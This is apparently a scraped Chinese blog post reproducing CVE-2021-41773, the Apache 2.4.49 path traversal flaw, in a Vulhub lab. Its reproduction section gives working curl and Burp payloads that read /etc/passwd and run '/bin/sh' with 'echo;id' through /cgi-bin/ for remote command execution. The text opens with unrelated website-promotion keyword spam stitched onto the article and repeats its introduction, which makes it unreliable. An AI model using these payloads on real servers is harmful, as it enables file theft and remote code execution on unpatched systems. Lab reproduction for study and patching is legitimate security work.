网站推广该怎么做,北京网站的建立,管理软件是什么,网站空间备案 昆明感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞验证方式一 curl方式二 bp抓包 说明内容漏洞编号CVE-2021-41773漏洞名称Apache HTTP 路径穿越漏洞漏… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞验证方式一 curl方式二 bp抓包 说明内容漏洞编号CVE-2021-41773漏洞名称Apache HTTP 路径穿越漏洞漏洞评级高危影响范围2.4.49漏洞描述在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件修复方案
1.1、漏洞描述
Apache HTTP服务器项目致力于为现代操作系统包括UNIX和Windows开发和维护开源HTTP服务器。
在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。
如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护则这些请求可以成功。如果CGI脚本也为这些别名路径启用则可以允许远程代码执行。
1.2、漏洞等级
高危
1.3、影响版本
Apache HTTP Server 2.4.49
1.4、漏洞复现
1、基础环境
PathVulhub/httpd/CVE-2021-41773 启动测试环境
sudo docker-compose build
sudo docker-compose up -d访问http://your-ip:8080/即可看到 2、漏洞验证
方式一 curl
/icons/必须是现有目录
curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd在服务器上启用mods cgi或cgid后此路径遍历漏洞将允许执行任意命令
curl -v --data echo;id http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh方式二 bp抓包
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id
